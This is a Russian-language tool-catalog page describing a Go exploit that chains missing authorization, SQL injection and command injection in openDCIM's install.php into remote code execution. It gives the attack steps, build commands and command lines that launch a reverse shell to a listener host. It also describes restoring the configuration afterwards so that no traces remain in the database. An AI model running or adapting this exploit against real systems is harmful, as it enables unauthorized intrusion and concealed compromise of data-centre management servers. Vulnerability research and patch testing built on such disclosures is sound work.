Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
opendcim-exploit — openDCIM install.php SQLi to RCE цепочка (CWE-862 + CWE-89 + CWE-78) | Kitploit
Инструменты/GitHubGitHub/chocapikk/opendcim-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubchocapikk/opendcim-exploit

opendcim-exploit

openDCIM install.php SQLi to RCE цепочка (CWE-862 + CWE-89 + CWE-78)

Репозиторий
525 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

openDCIM - SQL-инъекция до удаленного выполнения кода через отравление конфигурации

Цепочка удаленного выполнения кода, нацеленная на форму конфигурации LDAP install.php в openDCIM. Создана на основе фреймворка VulnCheck go-exploit.

Цепочка уязвимостей

#CVECWEОписание
1CVE-2026-28515CWE-862install.php не выполняет проверку ролей перед формой конфигурации LDAP — любой пользователь может получить к ней доступ
2CVE-2026-28516CWE-89Config::UpdateParameter() использует интерполяцию строк, составные запросы через PDO+MySQL
3CVE-2026-28517CWE-78report_network_map.php передает значение конфигурации dot напрямую в exec()

Затронуты: Все версии (протестировано на последнем коммите 4467e9c4)

Как это работает

  1. POST к install.php — SQL-инъекция через форму LDAP создает резервную копию конфигурации, перезаписывает dot командой полезной нагрузки
  2. GET к report_network_map.php — запускает exec(), подтверждает RCE через вывод id
  3. POST к install.php — перезаписывает dot полезной нагрузкой обратной оболочки
  4. GET к report_network_map.php — запускает обратную оболочку
  5. POST к install.php — восстанавливает все исходные значения конфигурации из резервной таблицы

После эксплуатации в базе данных не остается никаких следов.

Сборка

root@kitploit:~
go build -o opendcim-exploit .

Использование

Развертывания Docker (без аутентификации)

root@kitploit:~
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

Развертывания с htpasswd (любой допустимый пользователь)

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

Флаги

Скачать инструмент
ФлагПо умолчаниюОписание
-rhostЦелевой хост
-rport80Целевой порт
-sslfalseИспользовать HTTPS
-lhostХост-прослушиватель (для обратной оболочки)
-lportПорт-прослушиватель (для обратной оболочки)
-c2Тип C2: SimpleShellServer или SSLShellServer
-usernameИмя пользователя HTTP Basic Auth (опустите для развертываний SetEnv)
-passwordПароль HTTP Basic Auth (опустите для развертываний SetEnv)
-aОбнаружение активов (проверка, эксплуатируема ли цель)
-eРежим эксплуатации